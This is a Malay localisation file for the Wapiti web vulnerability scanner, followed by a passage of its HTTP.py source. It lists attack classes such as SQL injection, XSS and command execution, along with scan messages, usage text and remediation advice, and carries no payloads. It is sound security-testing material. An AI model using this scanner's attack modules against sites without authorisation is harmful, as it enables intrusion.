"{0} in {1} melalui suntikan pada parameter {2}" #: ../vulnerability.py:25 msgid " coming from {0}" msgstr " melalui {0}" #: ../vulnerability.py:26 msgid "{0} in {1} via injection in the query string" msgstr "{0} in {1} melalui suntikan pada rentetan perintah(query string) " #: ../vulnerability.py:27 msgid "{0} in {1} via injection in the resource path" msgstr "{0} in {1} melalui suntikan pada sumber laluan" #: ../vulnerability.py:28 msgid "Involved parameter: {0}" msgstr "Parameter terlibat: {0}" #: ../vulnerability.py:29 msgid "Evil request:" msgstr "Permintaan berbahaya:" #: ../vulnerability.py:67 msgid "SQL Injection" msgstr "Suntikan SQL" #: ../vulnerability.py:68 msgid "Blind SQL Injection" msgstr "Suntikan buta SQL " #: ../vulnerability.py:69 msgid "File Handling" msgstr "Pengendalian Fail" #: ../vulnerability.py:70 msgid "Cross Site Scripting" msgstr "Penyuntikan Skrip Ke Laman Web(Cross Site Scripting)" #: ../vulnerability.py:72 msgid "Commands execution" msgstr "Perintah arahan" #: ../vulnerability.py:73 msgid "Htaccess Bypass" msgstr "Pemintasan Htaccess" #: ../vulnerability.py:74 msgid "Backup file" msgstr "Fail Sadaran" #: ../vulnerability.py:75 msgid "Potentially dangerous file" msgstr "Fail berpontensi bahaya" #: ../vulnerability.py:80 msgid "Internal Server Error" msgstr "Ralat Pelayan Dalaman" #: ../vulnerability.py:81 msgid "Resource consumption" msgstr "Penggunaan sumber" #: ../vulnerability.py:83 msgid "Received a HTTP 500 error in {0}" msgstr "Terima ralat HTTP 500 dalam {0}" #: ../vulnerability.py:84 msgid "Timeout occured in {0}" msgstr "Tamat masa dalam {0}" #: ../vulnerability.py:86 msgid "The request timed out while attempting to inject a payload in the query string" msgstr "Permintaan tamat masa sementara mencuba untuk menyuntik muatan (payload) pada rentetan perintah (query string)" #: ../vulnerability.py:87 msgid "The request timed out while attempting to inject a payload in the resource path" msgstr "Permintaan tamat masa sementara mencuba untuk menyuntik muatan (payload) pada sumber laluan(resource path)" #: ../vulnerability.py:88 msgid "The request timed out while attempting to inject a payload in the parameter {0}" msgstr "Permintaan tamat masa ketika mencuba untuk menyuntik muatan (payload) pada parameter {0}" #: ../vulnerability.py:90 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the query string" msgstr "Pelayan membalas kod ralat HTTP 500 ketika mencuba menyuntik muatan (payload) pada rentetan perintah (query string)" #: ../vulnerability.py:92 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the resource path" msgstr "Pelayan membalas kod ralat HTTP 500 ketika mencuba untuk menyuntik muatan (payload) pada laluan sumber(resource path)" #: ../vulnerability.py:94 msgid "The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter {0}" msgstr "Pelayan membalas kod ralat HTTP 500 ketika mencuba untuk menyuntik muatan (payload) pada parameter {0}" #: ../wapiti.py:69 msgid "Invalid argument for option {0} : {1}" msgstr "Argumen tidah sah untuk pilihan {0} : {1}" #: ../wapiti.py:226 msgid "[*] Loading modules:" msgstr "[*] Memuatkan modul:" #: ../wapiti.py:297 msgid "No links or forms found in this page !" msgstr "Tiada pautan atau borang ditemui dalam muka laman ini !" #: ../wapiti.py:298 msgid "Make sure the url is correct." msgstr "Pastikan url adalah betul." #: ../wapiti.py:310 msgid "[!] Missing dependecies for module {0}:" msgstr "[!] Hilang kebergantungan untuk modul {0}:" #: ../wapiti.py:316 msgid "[+] Launching module {0}" msgstr "[+] Pelancaran modul {0}" #: ../wapiti.py:321 msgid "Upload scripts found:" msgstr "Memuat naik skrip (Upload scripts) ditemui:" #: ../wapiti.py:335 msgid "Report" msgstr "Laporan" #: ../wapiti.py:337 msgid "A report has been generated in the file {0}" msgstr "Laporan telah dijana dalam fail {0}" #: ../wapiti.py:339 msgid "Open {0}/index.html with a browser to see this report." msgstr "Buka {0}/index.html dengan pelayar web untuk melihat laporan ini." #: ../wapiti.py:410 msgid "wapitiDoc" msgstr "" "Wapiti-2.3.0 - Pengimbas kerentanan aplikasi web dan sekuriti auditor \n" " \n" " Usage: python wapiti.py http://server.com/base/url/ [options] \n" " \n" " Pilihan arahan yang disokong oleh aplikasi: \n" " -s \n" " --start \n" " \tUntuk menentukan url bermula dengan. Pilihan ini boleh diguna pakai beberapa kali.\n" " \tWapiti akan lihat pautan ini untuk mencari lebih banyak URL walaupun pautan tertentu tidak berada di dalam skop.\n" " \n" " -x \n" " --exclude \n" " \tUntuk mengecualikan URL dari imbasan (contoh: URL log keluar). Pilihan ini boleh diguna pakai beberapa kali untuk menentukan beberapa URL.\n" " \tKad liar (*) boleh digunakan di URL untuk regex asas.\n" " \tContoh : -x http://server/base/?page=*&module=test\n" " \tatau -x http://server/base/admin/* untuk mengecualikan satu direktori.\n" " \n" " -p \n" " --proxyi \n" " \tUntuk menentukan proksi. Proksi-proksi yang disokong pada masa ini adalah HTTP dan HTTPS.\n" " \tPilihan ini boleh digunakan dua kali untuk tentukan proksi HTTP dan HTTPS.\n" " \tContoh: -p http://proksi:port/\n" " \n" " -c \n" " --cookie \n" " \tUntuk mengimport cookie menggunakan imbasan. Fail cookie tersebut mesti dalam format JSON.\n" " \tCookies boleh diperolehi menggunakan utiliti cookie.py dan getcookie.py (direktori net).\n" " \n" " -t \n" " --timeout \n" " \tUntuk menetapkan had tamat masa(maksimum masa dalam saat menunggu pelayan untuk menghantar maklum balas).\n" " \n" " -a \n" " --auth \n" " \tKelayakan yang ditetapkan bagi pengesahan HTTP.\n" " \n" " --auth-method \n" " \tJika pelayan memerlukan pengesahan, tetapkan kaedah pengesahan untuk digunakan.\n" " \tKaedah yang disokong pada masa ini (sesetengah memerlukan modul tambahan untuk dimuat turun) adalah:\n" " \t\t+ basic\n" " \t\t+ digest\n" " \t\t+ kerberos\n" " \t\t+ ntlm\n" " \n" " -r \n" " --remove \n" " \tMengeluarkan satu parameter (nama dan nilai) dari URL.\n" " \n" " -n \n" " --nice \n" " \tMenentukan had URL untuk mencari dengan pola yang sama (iaitu, bilangan maksimum nilai-nilai yang unik bagi parameter yang sama).\n" " \tGunakan pilihan ini untuk menghalang 'loop' berterusan semasa imbasan. Had mesti lebih daripada 0.\n" " \n" " -m \n" " --module \n" " \tMenyediakan modul (dan kaedah HTTP untuk setiap modul) untuk diguna ketika serangan.\n" " \tGuna prefiks nama modul dengan 'dash' untuk menyahaktifkan modul yang berkaitan.\n" " \tUntuk hanya mencari sasaran (tanpa menghantar sebarang muatan), menyahaktifkan setiap modul dengan -m \"-all\".\n" " \tJika anda tidak menentukan kaedah HTTP, GET dan POST akan digunakan.\n" " \tContoh: -m \"-all,xss:get,exec:post\"\n" " \n" " -u \n" " --color \n" " \tMenggunakan warna untuk menyerlahkan kelemahan dan keganjilan (anomalies) dalam output. \n" " \n" " -v \n" " --verbose \n" " \tTetapkan tahap verbositi. \n" " \t0:tenang (default), 1: cetak setiap URL, 2: cetak setiap serangan. \n" " \n" " -b \n" " --scope \n" " \tSet skop imbasan:\n" " \t\t+ page: untuk menganalisis hanya muka laman yang diberikan sebagai URL asas.\n" " \t\t+ folder: untuk menganalisis semua URL di bawah URL asas dihantar ke Wapiti (default).\n" " \t\t+ domain: untuk menganalisis semua pautan pada muka laman yang mengandungi domain URL sama yang dihantar ke Wapiti.\n" " \n" " -f \n" " --format \n" " \tSet jenis format untuk laporan. \n" " \tjson: Laporan dalam format JSON \n" " \thtml: Laporan dalam format HTML (default)\n" " \topenvas: Laporan dalam format OpenVAS XML \n" " \ttxt: Laporran dalam teks biasa (UTF-8) \n" " \tvulneranet: Laporan dalam format VulneraNET (berasaskan XML) \n" " \txml: Laporan dalam format XML \n" " \n" " -o \n" " --output \n" " \tTetapkan nama fail laporan. \n" " \tJika format laporan yang dipilih adalah 'html', parameter ini akan digunakan sebagai nama direktori.\n" " \n" " -i \n" " --continue \n" " \tParameter ini menyatakan kepada Wapiti untuk menyambung imbasan sebelumnya yang disimpan di dalam\n" "fail status XML yang ditentukan sebelum ini.\n" " \tNama fail adalah pilihan, jika tidak dinyatakan, Wapiti mengambil fail " "default daripada direktori \"scans\".\n" " \n" " -k \n" " --attack \n" " \tParameter ini menyatakan kepada Wapiti untuk meneruskan serangan tanpa mengimbas " "laman web sekali lagi, memuatkan status imbasan daripada fail yang ditentukan.\n" " \tNama fail adalah pilihan, jika ia tidak dinyatakan, Wapiti mengambil default" "fail daripada direktori \"scans\".\n" " \n" " --verify-ssl <0|1>\n" " \tParameter ini menyatakan sama ada Wapiti perlu menyemak Sijil SSL.\n" " \tDefault adalah untuk mengesahkan sijil-sijil\n" " \n" " -h \n" " --help \n" " \tUntuk mencetak mesej penggunaan ini\n" " " #: ../wapiti.py:418 msgid "Wapiti-2.3.0 (wapiti.sourceforge.net)" msgstr "Wapiti-2.3.0 (wapiti.sourceforge.net)" #: ../wapiti.py:549 msgid "File {0} loaded. Wapiti will use it to perform the attack" msgstr "Fail {0} dimuatkan. Wapiti akan menggunakannya untuk melakukan serangan" #: ../attack/attack.py:166 msgid "+ attackGET {0}" msgstr "+ attackGET {0}" #: ../attack/attack.py:171 ../attack/attack.py:185 #: ../attack/mod_permanentxss.py:87 ../attack/mod_permanentxss.py:89 #: ../attack/mod_permanentxss.py:147 ../attack/mod_permanentxss.py:272 msgid "error: {0} while attacking {1}" msgstr "ralat: {0} ketika serangan {1}" #: ../attack/attack.py:173 ../attack/attack.py:187 msgid "error: timeout while attacking {0}" msgstr "ralat: tamat masa ketika serangan {0}" #: ../attack/attack.py:180 msgid "+ attackPOST {0} from {1}" msgstr "+ attackPOST {0} dari {1}" #: ../attack/mod_backup.py:89 msgid "Found backup file !" msgstr "Temui fail sandaran !" #: ../attack/mod_backup.py:94 msgid "Backup file {0} found for {1}" msgstr "Fail sandaran {0} ditemui untuk {1}" #: ../attack/mod_blindsql.py:40 msgid "Blind SQL vulnerability" msgstr "Kelemahan SQL buta " #: ../attack/mod_blindsql.py:93 ../attack/mod_file.py:146 #: ../attack/mod_sql.py:131 msgid "{0} via injection in the query string" msgstr "{0} melalui suntikan pada rentetan perintah (query string)" #: ../attack/mod_blindsql.py:141 ../attack/mod_blindsql.py:222 #: ../attack/mod_exec.py:195 ../attack/mod_exec.py:292 #: ../attack/mod_file.py:211 ../attack/mod_file.py:301 #: ../attack/mod_sql.py:258 msgid "{0} via injection in the parameter {1}" msgstr "{0} melalui suntikan pada parameter {1}" #: ../attack/mod_crlf.py:31 msgid "CRLF Injection" msgstr "Suntikan CRLF" #: ../attack/mod_crlf.py:70 ../attack/mod_crlf.py:77 msgid "(QUERY_STRING)" msgstr "(RENTETAN_QUERY)" #: ../attack/mod_crlf.py:121 msgid "Error: The server did not understand this request" msgstr "Ralat: Pelayan tidak memahami permintaan tersebut" #: ../attack/mod_exec.py:45 msgid "Command execution" msgstr "Perintah arahan" #: ../attack/mod_exec.py:48 msgid "PHP evaluation" msgstr "Penilaian PHP" #: ../attack/mod_exec.py:51 ../attack/mod_exec.py:54 msgid "Warning exec" msgstr "Amaran exec" #: ../attack/mod_exec.py:57 ../attack/mod_exec.py:63 msgid "preg_replace injection" msgstr "Suntikan preg_replace" #: ../attack/mod_exec.py:60 msgid "Warning usort()" msgstr "Amaran usort()" #: ../attack/mod_exec.py:66 msgid "Warning assert" msgstr "Amaran menegaskan" #: ../attack/mod_exec.py:69 msgid "Evalutation warning" msgstr "Amaran penilaian" #: ../attack/mod_file.py:40 msgid "Remote inclusion vulnerability" msgstr "Kemasukan kelemahan jauh (remote)" #: ../attack/mod_file.py:41 msgid "Linux local file disclosure vulnerability" msgstr "Kelemahan pendedahan fail Linux setempat" #: ../attack/mod_file.py:42 msgid "BSD local file disclosure vulnerability" msgstr "Kelemahan pendedahan fail BSD setempat" #: ../attack/mod_file.py:43 msgid "Windows local file disclosure vulnerability" msgstr "Kelemahan pendedahan fail Windows setempat" #: ../attack/mod_file.py:44 ../attack/mod_file.py:45 msgid "File disclosure vulnerability in include_path" msgstr "Kelemahan pendedahan fail pada include_path" #: ../attack/mod_file.py:46 msgid "highlight_file() vulnerability in basedir" msgstr "Kelemahan highlight_file() pada basedir" #: ../attack/mod_file.py:47 msgid "include() of file in include_path" msgstr "include() termasuk dalam include_path" #: ../attack/mod_file.py:84 msgid "Possible {0} vulnerability" msgstr "Kemungkinan {0} kelemahan" #: ../attack/mod_htaccess.py:75 msgid "HtAccess protection found: {0}" msgstr "Perlindungan HtAccess ditemui: {0}" #: ../attack/mod_htaccess.py:85 msgid "|HTTP Code: {0} : {1}" msgstr "|HTTP Kod: {0} : {1}" #: ../attack/mod_htaccess.py:88 ../attack/mod_htaccess.py:102 msgid "Source code:" msgstr "Kod program:" #: ../attack/mod_htaccess.py:94 msgid "{0} HtAccess" msgstr "{0} HtAccess" #: ../attack/mod_htaccess.py:95 msgid " .htaccess bypass vulnerability: {0}" msgstr " Kelemahan pemintasan .htaccess : {0}" #: ../attack/mod_htaccess.py:99 msgid "|HTTP Code: {0}" msgstr "Kod |HTTP: {0}" #: ../attack/mod_nikto.py:75 msgid "Problem with local nikto database." msgstr "Gangguan dengan pangkalan data setempat nikto" #: ../attack/mod_nikto.py:76 msgid "Downloading from the web..." msgstr "Memua turun dari web..." #: ../attack/mod_nikto.py:90 msgid "Error downloading Nikto database" msgstr "Ralat memuat turun pangkalan data Nikto" #: ../attack/mod_nikto.py:235 ../attack/mod_nikto.py:237 msgid "References:" msgstr "Rujukan:" #: ../attack/mod_permanentxss.py:57 msgid "Stored XSS vulnerability" msgstr "Kelemahan XSS simpanan (stored)" #: ../attack/mod_permanentxss.py:115 ../attack/mod_permanentxss.py:161 msgid "Found permanent XSS in {0} with {1}" msgstr "Menemui XSS tetap pada {0} dengan {1}" #: ../attack/mod_permanentxss.py:213 ../attack/mod_permanentxss.py:280 msgid "Found permanent XSS attacked by {0} with fields {1}" msgstr "Menemui serangan XSS tetap oleh{0} dengan medan {1}" #: ../attack/mod_sql.py:39 ../attack/mod_sql.py:41 msgid "MySQL Injection" msgstr "Suntikan MySQL" #: ../attack/mod_sql.py:43 msgid "Access-Based SQL Injection" msgstr "Akses berasaskan Suntikan SQL" #: ../attack/mod_sql.py:45 ../attack/mod_sql.py:47 ../attack/mod_sql.py:49 #: ../attack/mod_sql.py:70 msgid "MSSQL-Based Injection" msgstr "Suntikan berasaskan MSSQL" #: ../attack/mod_sql.py:52 msgid "Java.SQL Injection" msgstr "Suntikan Java.SQL" #: ../attack/mod_sql.py:54 msgid "PostgreSQL Injection" msgstr "Suntikan PostgreSQL" #: ../attack/mod_sql.py:56 ../attack/mod_sql.py:58 msgid "XPath Injection" msgstr "Suntikan XPath" #: ../attack/mod_sql.py:60 msgid "LDAP Injection" msgstr "Suntikan LDAP" #: ../attack/mod_sql.py:62 msgid "DB2 Injection" msgstr "Suntikan DB2" #: ../attack/mod_sql.py:64 msgid "Interbase Injection" msgstr "Suntikan Interbase" #: ../attack/mod_sql.py:66 msgid "Sybase Injection" msgstr "Suntikan Sybase" #: ../attack/mod_sql.py:68 msgid ".NET SQL Injection" msgstr "Suntikan .NET SQL" #: ../attack/mod_sql.py:72 msgid "Acess-Based SQL Injection" msgstr "Suntikan SQL berasaskan Akses" #: ../attack/mod_sql.py:76 msgid "Oracle Injection" msgstr "Suntikan Oracle" #: ../attack/mod_xss.py:59 msgid "XSS vulnerability" msgstr "Kelemahan XSS" #: ../attack/mod_xss.py:126 ../attack/mod_xss.py:337 msgid "XSS vulnerability found via injection in the resource path" msgstr "Kelemahan XSS ditemui melalui suntikan pada sumber laluan (resource path)" #: ../attack/mod_xss.py:196 msgid "XSS vulnerability found via injection in the query string" msgstr "Kelemahan XSS ditemui melalui suntikan pada rentetan perintah (query string)" #: ../attack/mod_xss.py:270 ../attack/mod_xss.py:437 msgid "XSS vulnerability found via injection in the parameter {0}" msgstr "Kelemahan XSS ditemui melalui suntikan pada parameter {0}" #: ../net/getcookie.py:97 msgid "No forms found in this page !" msgstr "Tiada borang ditemui pada muka laman ini !" #: ../net/getcookie.py:104 msgid "Choose the form you want to use :" msgstr "Pilih borang yang anda hendak guna:" #: ../net/getcookie.py:113 msgid "Enter a number : " msgstr "Masukkan nombor : " #: ../net/getcookie.py:120 msgid "Please enter values for the following form: " msgstr "Sila masukkan nilai untuk borang berikut: " #: ../net/getcookie.py:121 msgid "url = {0}" msgstr "url = {0}" #: ../net/cookie.py:75 msgid "Error getting url {0}" msgstr "Ralat mendapatkan url {0}" #: ../net/lswww.py:164 msgid "First argument must be the root url !" msgstr "Argumen pertama mestilah url asas (root url) !" #: ../net/lswww.py:169 msgid "Invalid protocol: {0}" msgstr "Protokol tidak sah: {0}" #: ../net/lswww.py:208 msgid "Invalid link argument: {0}" msgstr "Pautan argumen tidak sah: {0}" #: ../net/lswww.py:266 msgid "Connection refused!" msgstr "Sambungan ditolak!" #: ../net/lswww.py:270 msgid "Exception in lswww.browse: {0}" msgstr "Pengecualian pada lswww.browse: {0}" #: ../net/lswww.py:665 msgid "File {0} loaded, the scan continues:" msgstr "Fail {0} dimuatkan, imbasan terus:" #: ../net/lswww.py:667 msgid " * URLs to browse" msgstr " * URLs untuk dilayar" #: ../net/lswww.py:670 msgid " * URLs browsed" msgstr " * URLs dilayari" #: ../net/lswww.py:674 msgid "File {0} not found, Wapiti will scan again the web site" msgstr "Fail {0} tidak ditemui, Wapiti akan mengimbas semula laman web" #: ../net/lswww.py:707 ../net/lswww.py:715 msgid " Notice" msgstr " Notice" #: ../net/lswww.py:709 msgid "This scan has been saved in the file {0}/{1}.xml" msgstr "Imbasan ini telah disimpan dalam fail {0}/{1}.xml" #: ../net/lswww.py:711 msgid "You can use it to perform attacks without scanning again the web site with the \"-k\" parameter" msgstr "Anda boleh menggunakannya untuk melakukan serangan tanpa imbasan semula laman web dengan \"-k\" parameter" #: ../net/lswww.py:717 msgid "Scan stopped, the data has been savedin the file {0}/{1}.xml" msgstr "Imbasan berhenti, data telah disimpan dalam fail {0} / {1}.xml" #: ../net/lswww.py:719 msgid "To continue this scan, you should launch Wapiti with the \"-i\" parameter" msgstr "Untuk meneruskan imbasan ini, anda harus melancarkan Wapiti dengan \"-i\" parameter" #: ../net/lswww.py:729 msgid "URLs" msgstr "URLs" #: ../net/lswww.py:736 msgid "Forms Info" msgstr "Maklumat Borang" #: ../net/lswww.py:738 msgid "From: {0}" msgstr "Dari: {0}" #: ../net/lswww.py:739 msgid "To: {0}" msgstr "Ke: {0}" #: ../net/lswww.py:747 msgid "Upload Scripts" msgstr "Memuat naik skrip" #: ../net/lswww.py:1008 msgid "Forms" msgstr "Borang" #: ../net/lswww.py:1011 msgid "Form {0}" msgstr "Borang {0}" #: ../net/lswww.py:1015 msgid " * Method: {0}" msgstr " * Kaedah: {0}" #: ../net/lswww.py:1016 msgid " * Intputs:" msgstr " * Inputs:" #: ../net/lswww.py:1021 msgid " * Selects:" msgstr " * Pilih:" #: ../net/lswww.py:1026 msgid " * TextAreas:" msgstr " * Kawasan teks:" #: ../net/lswww.py:1032 msgid "URLS" msgstr "URLS" #: ../report/txtreportgenerator.py:69 msgid "Report for {0}\n" msgstr "Laporan untuk {0}\n" #: ../report/txtreportgenerator.py:70 msgid "Date of the scan : {0}\n" msgstr "Tarikh imbasan : {0}\n" #: ../report/txtreportgenerator.py:72 msgid "Scope of the scan : {0}\n" msgstr "Skop imbasan : {0}\n" #: ../report/txtreportgenerator.py:75 msgid "Summary of vulnerabilities :" msgstr "Rumusan kelemahan :" #: ../report/txtreportgenerator.py:78 msgid "{0} : {1:>3}\n" msgstr "{0} : {1:>3}\n" #: ../report/txtreportgenerator.py:88 ../report/txtreportgenerator.py:105 msgid "Evil request:\n" msgstr "Permintaan berbahaya:\n" #: ../report/txtreportgenerator.py:91 msgid "cURL command PoC : \"{0}\"" msgstr "Perintah cURL PoC : \"{0}\"" #: ../report/txtreportgenerator.py:97 msgid "Anomalies found:" msgstr "Keganjilan (anomalies) ditemui:" #: ../wapiti.py:560 ../wapiti.py:559 msgid "Attack process interrupted. To perform again the attack, lauch Wapiti with \"-i\" or \"-k\" parameter." msgstr "Proses serangan terganggu. Untuk mengulangi serangan, lancarkan Wapiti dengan \"-i\" or \"-k\" parameter." #: ../wapiti.py:551 msgid "File {0} not found. Wapiti will scan the web site again" msgstr "Fail {0} tidak ditemui. Wapiti akan imbas semula laman web" msgid "[!] Unable to find a module named {0}" msgstr "[!] Tidak dapat menemui modul yang dinama {0}" msgid "Backup file description" msgstr "" "Kemungkinan untuk menemui fail sandaran pada skrip di pelayan web " "dimana pentadbir web meletakkan disini untuk menyimpan versi sebelum atau fail sandaran yang " "dijana secara automasi oleh perisian penyuntingan (seperti Emacs). " "Salinan ini boleh mendedahkan maklumat yang menarik seperti kod program atau " "kelayakkan" msgid "Backup file solution" msgstr "" "Pentadbir web mesti secara manual menghapuskan fail sandaran atau mengalihnya keluar dari laman web " "asas (root). Pentadbir web perlu menyusun semula penyunting untuk menyahaktifkan sandaran automatik" msgid "Blind SQL Injection description" msgstr "" "Suntikan SQL buta merupakan teknik yang mengeksploitasi kelemahan yang berlaku " "in the database of an application. This kind of vulnerability is harder to " "dalam pangkalan data aplikasi. Kelemahan jenis ini lebih sukar untuk mengesan daripada suntikan SQL asas kerana mesej ralat akan dipaparkan " "pada laman web." msgid "Blind SQL Injection solution" msgstr "" "Untuk melindungi daripada suntikan SQL, input pengguna mestilah tidak terus dimasukkan " "ke dalam penyata SQL. Sebaliknya, input pengguna mesti di 'escaped' atau ditapis atau " "penyata diparameter mesti digunakan" msgid "Commands execution description" msgstr "" "Serangan ini terdiri dalam melaksanakan arahan sistem pada pelayan " "Penyerang cuba menyuntik perintah ini dalam parameter permintaan" msgid "Commands execution solution" msgstr "Lebih cenderung berfungsi tanpa pengguna input bila menggunakan fail sistem panggilan" msgid "CRLF description" msgstr "" "Istilah CRLF merujuk kepada Carriage Return (ASCII 13, \\r) Line Feed (ASCII 10, " "\\n). Ia digunakan untuk memaklumkan penamatan talian, Walau bagaimanapun, diuruskan " "berbeza dalam sistem operasi popular hari ini. Sebagai contoh: dalam Windows " "kedua-dua CR dan LF perlu ambil perhatian akhir garisan, manakala dalam Linux/" "UNIX LF yang hanya diperlukan. Kombinasi ini CR dan LR digunakan untuk " "contoh apabila menekan 'Enter' pada papan kekunci. Bergantung pada aplikasi " "digunakan, menekan 'Enter' pada amnya mengarahkan aplikasi untuk memulakan sebuah " "baris baru, atau untuk menghantar perintah." msgid "CRLF solution" msgstr "" "Semak parameter dihantar dan tidak membenarkan CRLF yang akan disuntik oleh " "penapisan CRLF" msgid "Cross Site Scripting description" msgstr "" "Serangan injeksi code pada laman (XSS) adalah jenis kelemahan keselamatan komputer " "biasanya didapati dalam aplikasi web yang membolehkan suntikan kod oleh " "pengguna web yang berniat jahat ke dalam laman web yang dilihat oleh pengguna web lain. Contoh-contoh Kod " "termasuk skrip kod HTML dan skrip klien." msgid "Cross Site Scripting solution" msgstr "" "Cara terbaik untuk melindungi aplikasi web yang daripada serangan XSS adalah memastikan bahawa " "aplikasi melaksanakan pengesahan semua pengepala, cookies, rentetan pertanyaan, " "medan borang, dan medan-medan yang tersembunyi. Pengguna pengekodan dibekalkan output dalam pelayan " "boleh juga mengalahkan kelemahan XSS dengan menghalang skrip yang dimasukkan dari " "dihantar kepada pengguna dalam bentuk yang boleh dilaksanakan. Aplikasi boleh mendapat " "perlindungan ketara daripada javascript berdasarkan serangan dengan menukar " "aksara berikut di semua output yang dihasilkan dengan entiti HTML yang sesuai " "pengekodan: <, >, &, ", ', (, ), #, %, ; , +, -." msgid "File Handling description" msgstr "" "Serangan ini adalah juga dikenali sebagai laluan Transversal atau Transversal direktori, dimana " "matlamatnya adalah akses kepada fail-fail dan direktori yang disimpan di luar web " "asas direktori. Penyerang cuba meneroka direktori yang disimpan dalam web " "pelayan. Penyerang menggunakan beberapa teknik, sebagai contoh, memanipulasi " "pembolehubah rujukan fail dengan ' dot-dot-slash (.../)' urutan dan " "variasi untuk bergerak ke direktori asas untuk mengemudi sistem fail ini" msgid "File Handling solution" msgstr "" "Lebih cenderung berfungsi tanpa input dari pengguna bila menggunakan fail sistem panggilan.Mengguna " "indeks daripada bahagian sebenar fail nama apabila membuat 'templating' atau menggunakan " "fail bahasa (cth: nilai 5 dari pilihan pengguna = Czechoslovakian, " "bukannya mengharapkan pengguna untuk kembali 'Czechoslovakian'). Memastikan " "pengguna tidak boleh membekalkan semua bahagian laluan - mengelilingi ia dengan kod laluan anda. " "Mengesahkan input pengguna dengan hanya menerima yang diketahui baik - jangan membetulkan " "data. Gunakan 'chrooted jails' dan kod akses polisi untuk menyekat di mana" "fail boleh diperolehi atau disimpan." msgid "Htaccess bypass description" msgstr "" "Fail htaccess digunakan untuk menyekat akses ke beberapa fail atau kaedah HTTP. Dalam " "sesetengah kes mungkin untuk memintas sekatan ini dan mengakses fail." msgid "Htaccess bypass solution" msgstr "Pastikan setiap kaedah HTTP adalah dilarang jika kelayakan yang buruk." msgid "Internal server error description" msgstr "Ralat telah berlaku pada bahagian pelayan, dimana mencegah proses permintaan. Ia mungkin tanda kelemahan" msgid "Internal server error solution" msgstr "Maklumat lanjut mengenai ralat perlu dicari dalam log pelayan." msgid "Potentially dangerous file description" msgstr "Fail yang berpotensi mempunyai kelemahan telah ditemui di laman web." msgid "Potentially dangerous file solution" msgstr "Pastikan skrip dikemaskini dan menghadkan capaian sekiranya boleh." msgid "Resource consumption description" msgstr "Ia mengambil masa yang tidak normal ke pelayan untuk membalas pertanyaan. Penyerang mungkin memanfaatkan kelemahan untuk memuat (overload) pelayan jenis ini." msgid "Resource consumption solution" msgstr "Skrip terlibat mungkin menggunakan sumber pelayan (CPU, memori, rangkaian, capaian fail...) dengan cara yang tidak efisyen." msgid "SQL Injection description" msgstr "" "suntikan kelemahan SQL ini membolehkan penyerang untuk mengubah pertanyaan yang dilaksanakan pada bahagian belakang pangkalan data. " "Penyerang kemudian mungkin dapat ekstrak atau mengubah suai maklumat yang disimpan dalam pangkalan data atau meningkatkatkan keistimewaan (privileges) pada sistem." msgid "SQL Injection solution" msgstr "" "Untuk melindungi daripada suntikan SQL, input pengguna mestilah tidak secara langsung dimasukkan " "ke dalam penyata SQL. Sebaliknya, input pengguna mesti 'escaped' atau ditapis atau " "penyata diparameter mesti digunakan" wapiti-2.3.0+dfsg/wapitiCore/net/000077500000000000000000000000001240201516300166165ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/net/HTTP.py000066400000000000000000000571551240201516300177640ustar00rootroot00000000000000#!/usr/bin/env python # -*- coding: utf-8 -*- # This file is part of the Wapiti project (http://wapiti.sourceforge.net) # Copyright (C) 2008-2013 Nicolas Surribas # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import urllib import urlparse import socket import os import cgi import requests import datetime from wapitiCore.net import jsoncookie from copy import deepcopy def shell_escape(s): s = s.replace('\\', '\\\\') s = s.replace('"', '\\"') s = s.replace('$', '\\$') s = s.replace('!', '\\!') s = s.replace('`', '\\`') return s class HTTPResource(object): _method = "GET" _encoding = "ISO-8859-1" _hostname = "" _resource_path = "" _file_path = "" _status = 0 _headers = {} _referer = "" _start_time = None _elapsed_time = None _port = 80 # Most of the members of a HTTPResource object are immutable so we compute # the data only one time (when asked for) and we keep it in memory for less # calculations in those "cached" vars. _cached_url = None _cached_get_keys = None _cached_post_keys = None _cached_file_keys = None _cached_encoded_params = None _cached_encoded_data = None _cached_encoded_files = None _cached_hash = None # eg: get = [['id', '25'], ['color', 'green']] _get_params = [] # same structure as _get_params _post_params = [] # eg: files = [['file_field', ('file_name', 'file_content')]] _file_params = [] def __init__(self, path, method="", get_params=None, post_params=None, encoding="UTF-8", referer="", file_params=None): """Create a new HTTPResource object. Takes the following arguments: path : The path of the HTTP resource on the server. It can contain a query string. get_params : A list of key/value parameters (each one is a list of two string). Each string should already be urlencoded in the good encoding format. post_params : Same structure as above but specify the parameters sent in the HTTP body. file_params : Same as above expect the values are a tuple (filename, file_content). encoding : A string specifying the encoding used to send data to this URL. Don't mistake it with the encoding of the webpage pointed out by the HTTPResource. referer : The URL from which the current HTTPResource was found. """ self._resource_path = path if post_params is None: self._post_params = [] elif isinstance(post_params, list): self._post_params = deepcopy(post_params) elif isinstance(post_params, basestring): self._post_params = [] if len(post_params): for kv in post_params.split("&"): if kv.find("=") > 0: self._post_params.append(kv.split("=", 1)) else: # ?param without value self._post_params.append([kv, None]) if file_params is None: self._file_params = [] elif isinstance(file_params, list): self._file_params = deepcopy(file_params) else: self._file_params = file_params if get_params is None: self._get_params = [] if "?" in self._resource_path: query_string = urlparse.urlparse(self._resource_path).query for kv in query_string.split("&"): if kv.find("=") > 0: self._get_params.append(kv.split("=", 1)) else: # ?param without value self._get_params.append([kv, None]) self._resource_path = self._resource_path.split("?")[0] elif isinstance(get_params, list): self._get_params = deepcopy(get_params) else: self._get_params = get_params if not method: # For lazy if self._post_params or self._file_params: self._method = "POST" else: self._method = "GET" else: self._method = method self._encoding = encoding self._referer = referer parsed = urlparse.urlparse(self._resource_path) self._file_path = parsed.path self._hostname = parsed.netloc if parsed.port is not None: self._port = parsed.port elif parsed.scheme == "https": self._port = 443 def __hash__(self): if self._cached_hash is None: get_kv = tuple([tuple(param) for param in self._get_params]) post_kv = tuple([tuple(param) for param in self._post_params]) file_kv = tuple([tuple([param[0], param[1][0]]) for param in 